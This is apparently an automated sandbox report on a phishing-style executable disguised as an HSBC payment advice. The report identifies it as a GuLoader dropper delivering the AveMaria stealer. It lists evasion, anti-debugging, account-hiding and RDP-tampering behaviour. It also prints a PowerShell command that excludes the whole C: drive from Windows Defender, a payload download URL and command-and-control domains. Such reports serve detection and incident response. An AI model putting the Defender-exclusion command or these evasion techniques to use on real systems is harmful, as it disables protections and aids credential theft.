              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Directory created: C:\Program Files\Microsoft DN1

              Data Obfuscation:

              Yara detected GuLoader
              Source: Yara match File source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, type: MEMORY
              Yara detected VB6 Downloader Generic
              Source: Yara match File source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00402440 push 0040119Ah; ret 0_2_00402453
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00407A43 push ecx; ret 0_2_00407A44
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00402454 push 0040119Ah; ret 0_2_00402467
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00402468 push 0040119Ah; ret 0_2_0040247B
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00407E78 push 4EEBB783h; ret 0_2_00407E7D
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00405679 push ds; iretd 0_2_00405762
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_0040247C push 0040119Ah; ret 0_2_0040248F
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00402418 push 0040119Ah; ret 0_2_0040242B
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_0040242C push 0040119Ah; ret 0_2_0040243F
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004024CC push 0040119Ah; ret 0_2_004024DF
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004024E0 push 0040119Ah; ret 0_2_004024F3
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004024F4 push 0040119Ah; ret 0_2_00402507
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00402490 push 0040119Ah; ret 0_2_004024A3
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00405692 push ds; iretd 0_2_00405762
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00408A9F push 3A3ADF06h; retf 0_2_00408AA7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004024A4 push 0040119Ah; ret 0_2_004024B7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004024B8 push 0040119Ah; ret 0_2_004024CB
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004023C8 push 0040119Ah; ret 0_2_004023DB
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004023DC push 0040119Ah; ret 0_2_004023EF
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004095E9 push ebp; iretd 0_2_004095EA
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004063EC push ecx; iretd 0_2_004063ED
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004023FF push 0040119Ah; ret 0_2_00402417
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_004023AF push 0040119Ah; ret 0_2_004023C7
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 12_2_017B01D0 push ebx; retf 12_2_017B01D9
              Source: C:\ProgramData\images.exe Code function: 28_2_017A1819 push ss; iretd 28_2_017A1CFC
              Source: C:\ProgramData\images.exe Code function: 28_2_017A0877 push ds; iretd 28_2_017A0973
              Source: C:\ProgramData\images.exe Code function: 28_2_017A20E4 push ds; ret 28_2_017A20E5
              Source: C:\ProgramData\images.exe Code function: 28_2_017A1CDB push ss; iretd 28_2_017A1CFC
              Source: C:\ProgramData\images.exe Code function: 28_2_017A1C97 push ss; iretd 28_2_017A1CFC
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe File created: C:\ProgramData\images.exe

              Hooking and other Techniques for Hiding and Protection:

              Contains functionality to hide user accounts
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
              Hides that the sample has been downloaded from the Internet (zone.identifier)
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Tries to detect Any.run
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe File opened: C:\Program Files\qga\qga.exe
              Source: C:\ProgramData\images.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\ProgramData\images.exe File opened: C:\Program Files\qga\qga.exe
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://SPUREDGE.COM/WARZONE_JBBOXCEY72.BIN
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe TID: 7136 Thread sleep count: 60 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3055
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSystem information queried: ModuleInformationJump to behavior
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
              Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: vmicvss
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://spuredge.com/warzone_JBBOxCEy72.bin
              Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWen-USnm
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

              Anti Debugging:

              Hides threads from debuggers
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Thread information set: HideFromDebugger
              Source: C:\ProgramData\images.exe Thread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\ProgramData\images.exe Code function: 28_2_017ABD0E mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exe Code function: 28_2_017A8FAA mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exe Code function: 28_2_017ADCC3 mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exe Code function: 28_2_017AC8BB mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exe Code function: 28_2_017AA3C5 LdrInitializeThunk

              HIPS / PFW / Operating System Protection Evasion:

              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Process created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\ProgramData\images.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmp Binary or memory string: Progman
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmp Binary or memory string: Progmanlock

              Lowering of HIPS / PFW / Operating System Security Settings:

              Increases the number of concurrent connection per server for Internet Explorer
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

              Stealing of Sensitive Information:

              Yara detected Generic Dropper
              Source: Yara match File source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Yara detected AveMaria stealer
              Source: Yara match File source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              GuLoader behavior detected
              Source: Initial file Signature Results: GuLoader behavior
              Source: Yara match File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR

              Remote Access Functionality:

              Yara detected AveMaria stealer
              Source: Yara match File source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 12 | Masquerading 3 | Input Capture 11 | Security Software Discovery 41 | Remote Services | Input Capture 11 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Endpoint Denial of Service 1
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 221 | Security Account Manager | Virtualization/Sandbox Evasion 221 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 12 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 213 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Hidden Users 1 | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Behavior Graph

              [Behavior graph. ID: 528768; Sample: HSBC Payment Advice.exe; Startdate: 25/11/2021; Architecture: WINDOWS; Score: 100.
              Processes: HSBC Payment Advice.exe started HSBC Payment Advice.exe, which started images.exe and powershell.exe; images.exe started images.exe; powershell.exe started conhost.exe.
              DNS/IP: spuredge.com (38.103.244.107, port 443, FHLB-OFUS, United States), barr2.ddns.net.
              Dropped files: C:\ProgramData\images.exe (PE32), C:\ProgramData\images.exe:Zone.Identifier (ASCII).]


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              HSBC Payment Advice.exe | 56% | Virustotal |
              HSBC Payment Advice.exe | 20% | Metadefender |
              HSBC Payment Advice.exe | 49% | ReversingLabs | Win32.Downloader.GuLoader
              HSBC Payment Advice.exe | 100% | Joe Sandbox ML |

              Dropped Files

              Source | Detection | Scanner | Label
              C:\ProgramData\images.exe | 100% | Joe Sandbox ML |
              C:\ProgramData\images.exe | 56% | Virustotal |
              C:\ProgramData\images.exe | 20% | Metadefender |
              C:\ProgramData\images.exe | 49% | ReversingLabs | Win32.Downloader.GuLoader

              Unpacked PE Files

              Source | Detection | Scanner | Label
              12.0.HSBC Payment Advice.exe.400000.1.unpack | 100% | Avira | TR/Dropper.VB.Gen
              12.0.HSBC Payment Advice.exe.400000.3.unpack | 100% | Avira | TR/Dropper.VB.Gen
              28.0.images.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
              12.0.HSBC Payment Advice.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
              28.0.images.exe.400000.1.unpack | 100% | Avira | TR/Dropper.VB.Gen
              0.0.HSBC Payment Advice.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
              21.2.images.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
              21.0.images.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
              0.2.HSBC Payment Advice.exe.400000.0.unpack | 100% | Avira | TR/Dropper.VB.Gen
              12.0.HSBC Payment Advice.exe.400000.2.unpack | 100% | Avira | TR/Dropper.VB.Gen
              28.0.images.exe.400000.2.unpack | 100% | Avira | TR/Dropper.VB.Gen
              28.0.images.exe.400000.3.unpack | 100% | Avira | TR/Dropper.VB.Gen

              Domains

              Source | Detection | Scanner | Label
              spuredge.com | 12% | Virustotal |

              URLs

              Source | Detection | Scanner | Label
              https://spuredge.com/warzone_JBBOxCEy72.bin | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              barr2.ddns.net | 194.5.97.4 | true | true | | unknown
              spuredge.com | 38.103.244.107 | true | true | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                https://spuredge.com/warzone_JBBOxCEy72.bin | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                https://github.com/syohex/java-simple-mine-sweeperC: | HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp | false | | high

                  Contacted IPs


                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  38.103.244.107 | spuredge.com | United States | 40695 | FHLB-OFUS | true

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:528768
                  Start date:25.11.2021
                  Start time:18:47:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:full
